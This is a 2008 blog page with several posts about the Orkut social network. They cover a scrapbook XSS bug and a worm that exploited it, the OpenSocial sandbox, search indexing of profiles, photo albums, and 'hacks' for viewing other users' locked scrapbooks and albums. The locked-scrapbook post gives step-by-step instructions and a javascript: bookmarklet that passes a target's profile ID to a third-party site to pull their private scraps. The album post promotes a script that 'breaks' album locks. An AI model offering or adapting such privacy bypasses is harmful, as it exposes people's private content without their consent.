Friday, February 15, 2008

New Attack on orkut! User gets logged out by just opening scrapbook!

Hackers discovered most serious bug on orkut and that’s too orkut’s most accessed area - scrapbook!

What makes it most serious is that this time user do not need to click or perform any action anywhere to trigger vulnerable codes.

Many users suffered from this. Most of them getting logged out of orkut by just visiting their own scrapbook. Worst they can not delete blank or suspicious scraps either! :-(

The bug is not fixed yet and this can be used by malicious hackers to gain access victims orkut account so details about this bug will be posted after it gets rectified, till then lets use following solution to save yourself!

Objective: Blocking flash content [on orkut atleast] Flashblock

# Firefox User:

Internet Explorer:

  • Go to the Tools Menu -> Internet Options
  • Click on the Security tab
  • Click on Custom Level
  • Disable Run ActiveX controls and plug-ins

image

Additionally delete scraps from your scrapbook if you are getting logged out of orkut on just visiting your own scrapbook!

Thanks Kee Hinckley for timely post on issue!

Related Posts:
Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • IndianPad
  • StumbleUpon
  • Technorati
  • YahooMyWeb
  • Furl
  • Reddit
  • Spurl
Posted by at No comments:

Beginners Guide To OpenSocial & Orkut Sandbox! [covering FAQ]

Many orkut users asked various questions about orkut sandbox to me via scrapbook, comments, community, email & other medium after I published 3 ways to read locked scrapbook on orkut! In this post, I will try to clear your doubts on orkut sandbox and opensocial.

#What is OpenSocial?

From wikipedia,

OpenSocial is a set of common application programming interfaces (APIs) for web-based social network applications, developed by Google, and released November 1, 2007. Applications implementing the OpenSocial APIs will be interoperable with any social network system that supports them, including features on sites such as MySpace and Friendster.

Except facebook almost all social networking sites are using OpenSocial. Means you can safely assume if you write application for orkut using OpenSocial API it will work on other sites (like MySpace, LinkedIn, etc) almost without change! :-)

#What is orkut sandbox?

First lets get relevant definition of sandbox from wikipedia

"The term sandbox is commonly used in the development of Web services to refer to a mirrored production environment for use by external developers. Typically, a third-party developer will develop an create an application that will use a web service from the sandbox, which is used to allow third-party team to validate their code before migrating it to the production environment"

So think of Orkut Sandbox as orkut mirror where you can write application using Open Social API. Its like creating a fake orkut account to test new orkut hack. Think of sandbox as a fake profile with some features added/removed and created by orkut itself for you to test applications!

#Cool… How to signup for orkut sandbox?

By default sandbox access is disabled for a orkut account. You can request access to sandbox using orkut sandbox sign up form. The sandbox access is completely free and will require you to have orkut account beforehand.

After submitting sign-up form you get mail from Google (normally in 2-3 days) indicating status of your request.

#How to access sandbox? Where it is?

Sandbox is extension to your existing orkut account! After receiving confirmation mail from google you can just log on to http://sandbox.orkut.com to enter into sandbox. Also you can modify any orkut pages’ URL to get its view from sandbox.

Example

http://www.orkut.com/scrapbook.aspx?uid=[some_num]

will become..

http://sandbox.orkut.com/scrapbook.aspx?uid=[some_num]

This URL changing resulted in scrapbook hack which enabled people to read locked scrapbook via sandbox!

#Sandbox Limitation

OpenSocial API Calls will operate on sandbox whitelisted friends only. This means to test your applications you need either your friends to gain sandbox access or add people who have access to sandbox as friends. There is an orkut sandbox community where you can find people with sandbox access and add them.

This limitation is enforced for security reasons as explained by Arne Roomann-Kurrik!

Also private information like email addresses of users can not be accessed! So spammers do not think about sandbox as a way for your evil intentions :-)

#Resources

If you are not familiar with words like sandbox, API use following wikipedia links…

Best starting point for developers…

Worth bookmarking….

Finally if you need to communicate…

Let me know if I missed anything! :-)

Related Posts:

Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • IndianPad
  • StumbleUpon
  • Technorati
  • YahooMyWeb
  • Furl
  • Reddit
  • Spurl
Posted by at No comments:

Orkut Scrapbook XSS Bug is Still Active!

After two days we posted about scrapbook bug and demonstration of its destructiveness by Rodrigo Lacerda (Portuguese link) and Jerry, it looks like orkut team haven’t got enough of it!

So on request of some of the members and also to force orkut to take this more seriously we are partially revealing the bug…

The bug is in embed tag’s src attribute! Orkut doesn’t validate if src is pointing to valid flash media file URL and thus any URL submitted as value of src attribute just get executed when user opens scrapbook! This is different than most infection where user have to generate some event like clicking on a particular region, link, etc.

Proof of Concept 1:

Here is harmless but highly annoying code which you can put in your friends orkut scrapbook. This is the reason why some people were getting logged out of orkut just by visiting their scrapbook!

Code:

Proof of Concept 2:

More serious but harmless exploitation is a worm created by Rodrigo Lacerda (Portuguese link) which is performing following routine.

  • You read the scrap with code (infact just open the scrapbook with code)
  • Code injects javascript in your browser
  • Javascript code makes you join the community
  • Then code collect your list of friends
  • Send the scrap with the code for them!

The community which is being joined is Infectados pelo VĂ­rus do Orkut! Just check out the community page and reload it. Look how fast the number of members increases. :-)

Solution:

Solution is in the form of flash block extension we talked about in earlier posts!

What should orkut do:

  • They should first activate CAPTCHA (i.e. image verification) for all URLs including their own. That way worm will stop spreading itself!
  • For future they should validate user input properly. XSS is most of the time result of improper validation of input. Like here they haven’t checked URL for filetype!

Update: Orkut in a official blog post claim to fix the bug! But this embed tag’s bug is still open! They might have fixed other bug which Rodrigo used!

Link: Post by Rodrigo Lacerda (in Portuguese ) | Flash Block Solution | Jerry post | Orkut’s official blog post

Related Posts:
Posted by at No comments:

Now You Can Have Your Orkut Profile in Google Search!

Yep. Soon Google crawlers will be indexing orkut profiles and everyone on orkut will be googlable. In simple terms you can use google search to find your friends’ orkut profile and your friends can do same to find you!

Although there is no official post regarding this on any Google or Orkut official blog, a new privacy setting - "orkut in google search results", indicates just this.

Orkut_in_google_search_results

By default this setting is configured to show your orkut information in search results! That’s why you don’t need to do anything to appear in google search.

Those who are concern about privacy can choose "hide information" option. There is no fine grained control like facebook provides. So better opt for hiding if you have doubt on how this feature will be used (or abused).

Three months back facebook opened their user database for search engines and considering facebooks that move this should not surprise anyone.

Also can orkut do this as sensibly as facebook did?

Related: Read how facebook did that!

Related Posts:
Posted by at No comments:

Orkut Viewing Locked Scrapbook Hack is Back!

Important Update: This hack is rectified by orkut. SO IT WILL NOT WORK ANYMORE. If I find a new hack I will definitely post it here!

You may subscribe to my RSS feed or email alert to receive automatic updates regarding this and other hacks in future! (Jan 3, 2008)

Yep! For those who missed old orkut hack to view locked scrapbook, a new hack to do the same is here!

orkut-unlock-scrapbook

#Steps to use this hack…

  • Navigate to the profile with locked scrapbook or locked scrapbook itself.
  • Now You will see Profile ID in address / navigation bar. Ex. In http://www.orkut.com/Profile.aspx?uid=10226448830416481862 , 10226448830416481862 is Profile ID. Note down this Profile ID.
  • Now replace Profiled in following textbox with Profile ID you have noted above.
  • http://x13.110mb.com/scraps.php?uid=ProfileID
  • So with Profile ID 10226448830416481862, it becomes http://x13.110mb.com/scraps.php?uid=10226448830416481862
  • Finally copy everything from text box and paste it in address bar. Hit ENTER and you will get scraps.

#Alternate way… (Javascript)

  • Navigate to the profile with locked scrapbook or locked scrapbook itself.
  • Paste Following javascript in address bar and hit ENTER.

javascript:var dw = document.location.href; dw = dw.split(’=');document.location=’http://x13.110mb.com/scraps.php?uid=’+dw[1];

#Alternate way… (For Firefox Only)

You can drag-n-drop following bookmarklet on your browsers bookmark toolbar. That will create a bookmark named "UNLOCK SCRAPBOOK". Just click on it whenever you encounter any locked scrapbook and you will be redirected to unlocked scrapbook automatically…

Unlock Scrapbook

Looks like a bad start for orkut in 2008. Thanks Jerry!

Also check out View Photos from Locked Orkut Album!

Related Posts:
Posted by at No comments:

Organize Photos into Album on Orkut - New Feature!

After revising photo upload limits to 100 next thing everyone wanted is a way to manage photos nicely! Orkut answered your call and now you can group your photos into different albums like my vacation album, new year party pics, birthday snaps, …

So when you click photos link now you will see following…

image

Just choose a title and description, your album will be ready. Next you will be taken to screen where you can upload pics into it! Uploading is the same old process. I was expecting a java applet like facebook provides.

Final album will look like this…

image

After creating a album things you can customize anytime are

  • Album cover
  • Name of album i.e. title
  • Album description
  • Of course photos inside album!

One feature orkut should have given is to move photos between album. As of now if you have uploaded lots of photos on orkut on different topics, you can not move them just into different albums. You have to download them first to hard drive, then upload them again different album!

Anyway something nice from orkut after their scrapbook and album hacks!

Related: Official Orkut Blog Post

Related Posts:
Posted by at No comments:

View Locked Orkut Album in Orkut Style!

Important Update: This hack is rectified by orkut. SO IT WILL NOT WORK ANYMORE. If I find a new hack I will definitely post it here!

You may subscribe to my RSS feed or email alert to receive automatic updates regarding this and other hacks in future! (Jan 17, 2008)

This is highly recommended way of exploiting Orkut album hack to unlock (view) pics in the album!

View_locked_orkut_album

Many users claimed that our old orkut album hack is not working. While we noticed few exception most of the users had trouble in copying and pasting lengthy javascript code. So here comes an automated way - a GreaseMonkey script!

Once you install above script successfully, next time you go to any Orkut locked orkut album, you will see pics from locked orkut album in orkut style alongwith error message which obviously lost its meaning! (See screenshot above)

#How to Install (Need to do this only once!)

Thats it! All locks will be broken automatically as they never existed! :D

#Credits:

Thanks Leandro Koiti Sato for creating this script script. Original script is here. We made a small change in our version to give maximum result to our users!

Thanks Bean for notifying about script! :-)

Related Posts:
Posted by at No comments:
Subscribe to: Comments (Atom)